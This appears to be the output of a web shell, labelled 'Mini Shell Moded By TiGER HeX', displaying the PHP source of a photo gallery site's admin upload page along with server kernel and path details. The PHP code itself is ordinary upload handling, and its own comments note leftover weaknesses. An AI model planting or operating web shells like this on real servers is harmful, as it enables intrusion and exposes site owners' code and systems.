Mini Shell Moded By TiGER HeX
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
//var/www/50mmla/admin/galleryAdd.php
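<?php
/*
 * Admin gallery upload page.
 *
 * On POST, walks the upload slots file1..file9 (the loop bound is
 * $i < $num_uploads). For each slot with a file it validates the upload,
 * writes a cropped thumbnail and a watermarked full-size image through
 * gd_img, optionally inserts a new artist row, and inserts the gallery row.
 * It then renders the upload form with the same number of slots.
 *
 * Security notes for maintainers:
 *  - Every request value that reaches SQL is cast, pattern-checked or
 *    escaped below. addslashes() is a stopgap because the $db wrapper's own
 *    escaping / prepared-statement API is not visible from this file; it is
 *    not charset-aware, so switch to the wrapper's mechanism once confirmed.
 *    NOTE(review): if an include already escapes request data, drop the
 *    addslashes() calls to avoid storing doubled backslashes.
 *  - Every value echoed into HTML is escaped. 'ISO-8859-1' is passed to
 *    htmlspecialchars() so that only the ASCII metacharacters are rewritten
 *    and bytes >= 0x80 pass through unchanged, whatever charset the page uses.
 *  - NOTE(review): this state-changing form carries no anti-CSRF token.
 *  - NOTE(review): die($sql_error['message']) shows raw database errors to
 *    the browser; consider logging them and showing a generic message.
 *  - Full "<?php" tags are used: with short_open_tag disabled, "<?" blocks
 *    are sent to the client as plain text, exposing this source.
 */
include_once('../includes/static/configure.php');
include_once('../includes/static/util.php');
include_once('../includes/static/dbcon.php');
include_once('../includes/static/gdimg.php');
include_once('../includes/static/sessions.php');
include_once('includes/static/util.php');
include_once('includes/appTop.php');

// Permission is keyed on the script name without its ".php" suffix.
$page_id = str_replace(".php", "", basename($_SERVER['PHP_SELF']));
if (!has_permission($page_id)) {
    die("You don't have permission to view this page!");
}

$html = "";
// Not read in this file; kept in case an included template reads them.
$story_title = "";
$story_body = "";
$uid = 0;
$num_uploads = 10;

if (isset($_SESSION['admin_id'])) {
    $uid = $_SESSION['admin_id'];
} elseif (isset($_SESSION['editor_id'])) {
    $uid = $_SESSION['editor_id'];
}

// artistId has been passed to this page so show appropriate fields
$artist_defined = isset($_REQUEST['artistId']);

if (isset($_POST['submit'])) {
    for ($i = 1; $i < $num_uploads; $i++) {
        // Skip slots that were not posted, or were posted as arrays (file1[]).
        if (!isset($_FILES['file'.$i]) || !is_string($_FILES['file'.$i]['name'])) {
            continue;
        }
        $upload    = $_FILES['file'.$i];
        $cur_file  = $upload['name'];
        $cur_temp  = $upload['tmp_name'];
        $cur_mime  = $upload['type']; // client-supplied; replaced by the detected type below
        $cur_size  = $upload['size'];
        $cur_error = $upload['error'];

        // Read the per-slot fields as plain strings; missing or array values become ''.
        $fields = array();
        foreach (array('comment', 'location', 'year', 'artist', 'newArtist') as $key) {
            $raw = isset($_REQUEST[$key.$i]) ? $_REQUEST[$key.$i] : '';
            $fields[$key] = is_string($raw) ? $raw : '';
        }
        $comment    = $fields['comment'];
        $location   = $fields['location'];
        // The form only offers four-digit years; anything else is stored as ''.
        $year       = preg_match('/^[0-9]{4}\z/', $fields['year']) ? $fields['year'] : '';
        // Empty or non-numeric selections become 0, as in the original empty() check.
        $artist_id  = (int) $fields['artist'];
        $new_artist = $fields['newArtist'];

        if (empty($cur_file)) {
            continue;
        }

        $valid = validate_content($cur_error, $cur_mime, $cur_size, $cur_file, GALLERY_MAX_KB);
        if ($valid['result']) {
            // Trust the file's own bytes rather than the browser's Content-Type:
            // the temp file must be a real HTTP upload that parses as an image.
            $img_info = is_uploaded_file($cur_temp) ? getimagesize($cur_temp) : false;
            if ($img_info === false) {
                $valid = array('result' => false, 'error' => 'File is not a valid image upload');
            } else {
                $cur_mime = $img_info['mime'];
            }
        }

        if (!$valid['result']) {
            $html .= "<div class=\"error\">Unable to store the following content "
                . htmlspecialchars($cur_file, ENT_QUOTES, 'ISO-8859-1')
                . "<br> Reason: ".$valid['error']."</div>";
            continue;
        }

        $type = explode("/", $cur_mime);
        $cur_type = trim($type[0]);
        // basename() drops any directory part before the name is appended to a path.
        // NOTE(review): confirm get_unique_filename() limits the extension to image types.
        $unique_name = basename(get_unique_filename($cur_file));

        $gd = new gd_img($cur_mime, $cur_temp);
        if (!$gd->img_id) { die($gd->gd_error); }
        $id = $gd->img_id;

        // create thumbnail
        $id_t = $gd->gd_crop_img(GALLERY_THUMB_WIDTH, GALLERY_THUMB_HEIGHT, IMG_QUALITY);
        if (!$id_t) { die($gd->gd_error); }
        $res = $gd->gd_create_img($id_t, ROOT_DIR.GALLERY_SIMG_DIR.$unique_name);
        if (!$res) { die($gd->gd_error); }

        // create watermark image
        $w_type = getimagesize(WATERMARK_FILE);
        $gdw = new gd_img($w_type['mime'], WATERMARK_FILE);
        if (!$gdw->img_id) { die($gdw->gd_error); }

        // apply watermark
        $res = $gd->gd_merge_ids($id, $gdw->img_id);
        if (!$res) { die($gd->gd_error); }

        // create image
        $res = $gd->gd_create_img($id, ROOT_DIR.GALLERY_LIMG_DIR.$unique_name);
        if (!$res) { die($gd->gd_error); }

        // Escaped copies used only inside the SQL string literals below.
        $uid_sql      = addslashes((string) $uid);
        $location_sql = addslashes($location);
        $comment_sql  = addslashes($comment);
        $name_sql     = addslashes($unique_name);

        // add new artist
        if (!empty($new_artist)) {
            $new_artist_sql = addslashes($new_artist);
            $sql = "INSERT INTO 50mm_artists (artist_name,location,user_id,approved,entry_time) VALUES ('$new_artist_sql','$location_sql','$uid_sql',1,NOW())";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                die($sql_error['message']);
            }
            $sql = "SELECT LAST_INSERT_ID() AS artist_id";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                die($sql_error['message']);
            }
            $row = $db->sql_fetchrow($result);
            $artist_id = (int) $row['artist_id'];
        }

        // add photo
        $sql = "INSERT INTO 50mm_gallery (artist_id,image,user_id,comment,year_painted,location,approved,entry_time) VALUES ('$artist_id','$name_sql','$uid_sql','$comment_sql','$year','$location_sql',1,NOW())";
        if (!($result = $db->sql_query($sql))) {
            $sql_error = $db->sql_error();
            die($sql_error['message']);
        }
        $html .= "<div class=\"hilite\">Your have successfully added your flick!</div>";
    }
}

include_once('includes/header.php');
?> <?php echo $html; ?> <script> divs = new Array('file1'); </script> <form id="gallery" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'ISO-8859-1'); ?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'flickError');"> <?php
if (!$artist_defined) {
    $sql = "SELECT artist_name,artist_id FROM 50mm_artists WHERE approved = 1 ORDER BY artist_name ASC";
    if (!($result = $db->sql_query($sql))) {
        $sql_error = $db->sql_error();
        die($sql_error['message']);
    }
    $artist_dd = "<option value=\"\">-- select artist --</option>\n";
    while ($row = $db->sql_fetchrow($result)) {
        // Artist names are user-supplied (see the INSERT above), so escape them on output.
        $artist_dd .= "<option value=\"".(int) $row['artist_id']."\">"
            . htmlspecialchars($row['artist_name'], ENT_QUOTES, 'ISO-8859-1')
            . "</option>\n";
    }
} else {
    // The id is echoed back into hidden inputs; an integer cannot break out of the attribute.
    $linked_artist_id = (int) $_REQUEST['artistId'];
}

$year = 1901;
$year_end = date('Y') + 1;
$year_dd = "<option value=\"\">-- select year --</option>\n";
for ($year; $year <= $year_end; $year++) {
    $year_dd .= "<option value=\"".$year."\">".$year."</option>\n";
}

$form = "";
for ($i = 1; $i < $num_uploads; $i++) {
    if ($i == 1) {
        $form .= "Upload Image:<span id=\"errfile1\" class=\"error\" style=\"visibility:hidden;\"> *</span><br><input type=\"file\" name=\"file".$i."\" class=\"field\"><br>\n";
    } else {
        $form .= "Upload Image:<br><input type=\"file\" name=\"file".$i."\" class=\"field\"><br>\n";
    }

    // then we must choose and artist
    if (!$artist_defined) {
        $form .= "Select an existing 50mm artist:<br>";
        $form .= "<select name=\"artist".$i."\">\n";
        $form .= $artist_dd;
        $form .= "</select><br>\n";
        $form .= "Or Add a new 50mm artist:<br><input type=\"text\" name=\"newArtist".$i."\" value=\"\" class=\"field\"><br>\n";
    } else { // we've hotlinked here from another page
        $form .= "<input type=\"hidden\" name=\"artist".$i."\" value=\"".$linked_artist_id."\"><br>";
        $form .= "<input type=\"hidden\" name=\"newArtist".$i."\" value=\"\">\n";
        $form .= "<input type=\"hidden\" name=\"artistId\" value=\"".$linked_artist_id."\"><br>";
    }

    $form .= "Year Painted:<br>";
    $form .= "<select name=\"year".$i."\">\n";
    $form .= $year_dd;
    $form .= "</select><br>\n";
    $form .= "City/Country:<br><input type=\"text\" name=\"location".$i."\" value=\"\" class=\"field\"><br>\n";
    $form .= "Comments Or Additonal Artist:<br><textarea wrap=\"on\" name=\"comment".$i."\" class=\"body\" style=\"width: 400px; height:70px;\"></textarea><br>\n";
    $form .= "<br><div class=\"borderLines\" height=\"1\"><img src=\"/images/spacer.gif\" width=\"600\" height=\"1\"></div><br>\n";
}
$form .= "<input name=\"submit\" type=\"submit\" class=\"button\" value=\"Submit Photo\">\n";
$form .= "<div id=\"flickError\" class=\"error\" style=\"visibility:hidden;\">Please correct the fields marked by *</div>";
echo $form;
?> </form> <?php
include_once('includes/footer.php');
include_once('includes/appBottom.php');
?>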